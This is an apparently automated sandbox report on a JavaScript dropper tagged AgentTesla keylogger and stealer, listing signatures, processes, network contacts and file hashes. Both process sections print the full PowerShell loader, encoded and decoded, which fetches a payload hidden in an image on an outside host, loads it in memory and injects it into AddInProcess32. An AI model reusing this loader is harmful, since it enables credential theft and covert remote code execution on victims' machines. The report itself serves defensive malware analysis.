Malware Analysis Report

2024-11-30 05:49

Sample ID 240610-nkbgzsgh9z
Target ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js
SHA256 ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b
Tags
execution agenttesla keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b

Threat Level: Known bad

The file ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js was found to be: Known bad.

Malicious Activity Summary

execution agenttesla keylogger spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Looks up external IP address via web service

Suspicious use of SetThreadContext

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 11:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 11:26

Reported

2024-06-10 11:29

Platform

win7-20240221-en

Max time kernel

118s

Max time network

119s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LmVwLzE3LjkzLjMyMS4zOS8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948', 'https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ep/17.93.321.39//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 104.21.45.138:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.153:80 apps.identrust.com tcp

Files

memory/2580-20-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/2580-22-0x0000000000670000-0x0000000000678000-memory.dmp

memory/2580-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-24-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-23-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-27-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-26-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2580-21-0x000000001B700000-0x000000001B9E2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TJSTGYOGL36EIKQTS6X4.temp

MD5 4a827a117708c242a96a6cc938a2c837
SHA1 088b844b85ad639660a130e0629023dafaa2a9bd
SHA256 f792d54d061a1316243948c2a847ca9c0e679fca437c37d3d58040944b40a4c3
SHA512 9f43318f31e8ea4aaafbbe8a91fe8b85ee06585ee761454d6a7a1251411450c01bafea135450c9edee7a8961daf432d7eaa3902cf870b5b5114b98cdf6c04223

C:\Users\Admin\AppData\Local\Temp\Tar2E06.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Cab2DF3.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bd01f614a72e4cd4a932a7f852b8042
SHA1 770b7758a7a9b85c5a504fbae1cb7e674c1a4446
SHA256 15c6691d90b2b1f8a8e56faeae2ff72120fc4f8ace435d9bca22f30366350235
SHA512 a04e4f4fe469933f2ae6a955b50fecba19a358a730e512e0042023cba481ced4516931d59db55744b3e291e73f6d4191a2dcd404d06ec91bc5298d5ecc511635

C:\Users\Admin\AppData\Local\Temp\Tar32DC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 671bd0dfab4bf5681f03b147b4ab690b
SHA1 5bf69518848cc1654174c4c6a84ffb50932ff786
SHA256 a878a62f28d1c4ced8202bf0b53932b5d8294cec451af0829529e74d65270758
SHA512 8fd6208e0f993f0a9293aafec198dd829fc83399368ddaf23c9b558acefa9f4823756fd71d84be2958ae55865d9d638ddce621f527a12610d7c9d85baa3d444d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1664-100-0x000000001AE60000-0x000000001B04E000-memory.dmp

memory/2580-101-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 11:26

Reported

2024-06-10 11:29

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

153s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1816 set thread context of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4092 wrote to memory of 4968 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4092 wrote to memory of 4968 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 1816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1816 wrote to memory of 2176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 2176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 2176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1816 wrote to memory of 1764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ff9217b4b482b604d5c89e9c8418a627fca4ad739cdc62d3f17da48aceaff19b.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4JywgJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc5NC84OTgvb3JpZ2luYWwvbmV3X2ltYWdlLmpwZz8xNzE3ODU1OTQ4Jyk7ICRpbWFnZUJ5dGVzID0gRG93bmxvYWREYXRhRnJvbUxpbmtzICRsaW5rczsgaWYgKCRpbWFnZUJ5dGVzIC1uZSAkbnVsbCkgeyAkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGltYWdlQnl0ZXMpOyAkc3RhcnRGbGFnID0gJzw8QkFTRTY0X1NUQVJUPj4nOyAkZW5kRmxhZyA9ICc8PEJBU0U2NF9FTkQ+Pic7ICRzdGFydEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRzdGFydEZsYWcpOyAkZW5kSW5kZXggPSAkaW1hZ2VUZXh0LkluZGV4T2YoJGVuZEZsYWcpOyBpZiAoJHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAkZW5kSW5kZXggLWd0ICRzdGFydEluZGV4KSB7ICRzdGFydEluZGV4ICs9ICRzdGFydEZsYWcuTGVuZ3RoOyAkYmFzZTY0TGVuZ3RoID0gJGVuZEluZGV4IC0gJHN0YXJ0SW5kZXg7ICRiYXNlNjRDb21tYW5kID0gJGltYWdlVGV4dC5TdWJzdHJpbmcoJHN0YXJ0SW5kZXgsICRiYXNlNjRMZW5ndGgpOyAkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkYmFzZTY0Q29tbWFuZCk7ICRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGNvbW1hbmRCeXRlcyk7ICR0eXBlID0gJGxvYWRlZEFzc2VtYmx5LkdldFR5cGUoJ1J1blBFLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LmVwLzE3LjkzLjMyMS4zOS8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948', 'https://uploaddeimagens.com.br/images/004/794/898/original/new_image.jpg?1717855948'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ep/17.93.321.39//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 67.84.21.104.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 163.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 23.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 172.67.215.45:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 45.215.67.172.in-addr.arpa udp
BG 93.123.39.71:80 93.123.39.71 tcp
US 8.8.8.8:53 71.39.123.93.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/4968-9-0x00007FFB50DF3000-0x00007FFB50DF5000-memory.dmp

memory/4968-15-0x00000173EA5C0000-0x00000173EA5E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_351f2t1c.eza.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4968-20-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp

memory/4968-21-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp

memory/1816-31-0x000001FDFEDC0000-0x000001FDFEFAE000-memory.dmp

memory/1764-32-0x0000000000400000-0x0000000000442000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

memory/4968-38-0x00007FFB50DF0000-0x00007FFB518B1000-memory.dmp

memory/1764-39-0x00000000056B0000-0x0000000005C54000-memory.dmp

memory/1764-40-0x0000000005170000-0x00000000051D6000-memory.dmp

memory/1764-41-0x00000000063F0000-0x0000000006440000-memory.dmp

memory/1764-42-0x00000000064E0000-0x0000000006572000-memory.dmp

memory/1764-43-0x0000000006460000-0x000000000646A000-memory.dmp